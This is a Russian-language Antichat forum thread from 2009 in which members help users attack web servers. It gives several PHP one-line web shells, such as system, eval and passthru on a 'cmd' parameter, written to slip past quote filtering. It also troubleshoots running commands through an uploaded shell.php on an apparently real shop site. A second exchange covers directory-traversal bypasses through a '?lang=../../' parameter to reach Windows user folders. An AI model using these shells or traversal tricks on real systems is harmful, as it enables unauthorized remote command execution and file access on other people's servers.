Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
12.11.2009, 13:51
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 68
Провел на форуме:
330834
Репутация:
90
|
|
Сообщение от sideup
Добрый день!
Подскажите пожалуйста
не могу записать в файл на сервере код CMD
<?php system($_GET["cmd"]); ?>
сервер походу фильтрует кавычки.
Подскажите как это обойти, чтобы получить шелл.
Или это невозможно?
 печальный вопрос
Код:
<?system($_GET[cmd])?>
<?eval($_GET[cmd])?>
<?passthru($_GET[cmd])?>
<?eval($_REQUEST[cmd])?>
<?passthru($_REQUEST[cmd])?>
<?system($_REQUEST[cmd])?>
и да, мне интересно через что ты заливаешь шелл?
если через скулинъект, то как бы ты не сможешь вообще ничего залить если у тебя как ты говоришь ГПЦ=ОН
Последний раз редактировалось Aртем; 12.11.2009 в 14:01..
|
|
|
12.11.2009, 14:33
|
|
Новичок
Регистрация: 10.04.2008
Сообщений: 8
Провел на форуме:
20161
Репутация:
0
|
|
Warning: Wrong parameter count for system() in
/home/site-shop.com/site/site/shell.php on line 1
При выполнении шелла такая ошибка.
|
|
|
|
12.11.2009, 14:40
|
|
Новичок
Регистрация: 12.10.2007
Сообщений: 14
Провел на форуме:
80412
Репутация:
7
|
|
Подскажите. Могу читать файлы и листинг файлов в папке через cgi
Папку "?lang=../../../../WINDOWS/" выводит нормально. А вот в "?lang=../../../../Documents and Settings/" не получается. Походу из-за пробелов.Как бы это обойти. Прочтовал пробел заменить на 0x20 непомогло. Также попробовал всю строку представить в других кодировках (url, sql, char) непомогает.
|
|
|
|
12.11.2009, 14:48
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 68
Провел на форуме:
330834
Репутация:
90
|
|
Сообщение от sideup
Warning: Wrong parameter count for system() in
/home/site-shop.com/site/site/shell.php on line 1
При выполнении шелла такая ошибка.
а ты передавал команды?
|
|
|
|
12.11.2009, 14:50
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Сообщение от sideup
Warning: Wrong parameter count for system() in
/home/site-shop.com/site/site/shell.php on line 1
При выполнении шелла такая ошибка.
кагбэ так:
http://127.0.0.1/index.php?cmd=ls
и т д
|
|
|
|
12.11.2009, 14:53
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
Сообщение от icekvot
Подскажите. Могу читать файлы и листинг файлов в папке через cgi
Папку "?lang=../../../../WINDOWS/" выводит нормально. А вот в "?lang=../../../../Documents and Settings/" не получается. Походу из-за пробелов.Как бы это обойти. Прочтовал пробел заменить на 0x20 непомогло. Также попробовал всю строку представить в других кодировках (url, sql, char) непомогает.
возможно надо сделать "Documents\ and\ Settings"
|
|
|
|
12.11.2009, 14:54
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от icekvot
Подскажите. Могу читать файлы и листинг файлов в папке через cgi
Папку "?lang=../../../../WINDOWS/" выводит нормально. А вот в "?lang=../../../../Documents and Settings/" не получается. Походу из-за пробелов.Как бы это обойти. Прочтовал пробел заменить на 0x20 непомогло. Также попробовал всю строку представить в других кодировках (url, sql, char) непомогает.
В Documents and Setting незайдёшь из шелла, ибо прав нету =\
|
|
|
|
12.11.2009, 15:01
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 68
Провел на форуме:
330834
Репутация:
90
|
|
Сообщение от icekvot
Подскажите. Могу читать файлы и листинг файлов в папке через cgi
Папку "?lang=../../../../WINDOWS/" выводит нормально. А вот в "?lang=../../../../Documents and Settings/" не получается. Походу из-за пробелов.Как бы это обойти. Прочтовал пробел заменить на 0x20 непомогло. Также попробовал всю строку представить в других кодировках (url, sql, char) непомогает.
в DOS формате заюзать попробуй 
|
|
|
|
12.11.2009, 15:02
|
|
Новичок
Регистрация: 10.04.2008
Сообщений: 8
Провел на форуме:
20161
Репутация:
0
|
|
Сообщение от -m0rgan-
кагбэ так:
http://127.0.0.1/index.php?cmd=ls
и т д
Да. Конечно. Но ничего.
Пробовал <?php phpinfo(); ?> работает отлично.
Залил вот это <?php%20@eval(\$_POST[cmd]);?> ошибок
не выдаёт, но что-то не пойму как команды выполнять
shell.php?cmd=id не катит.
|
|
|
|
12.11.2009, 15:04
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332
Репутация:
1196
|
|
Сообщение от sideup
Да. Конечно. Но ничего.
Пробовал <?php phpinfo(); ?> работает отлично.
Залил вот это <?php%20@eval(\$_POST[cmd]);?> ошибок
не выдаёт, но что-то не пойму как команды выполнять
shell.php?cmd=id не катит.
переметру cmd передавай пых код
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
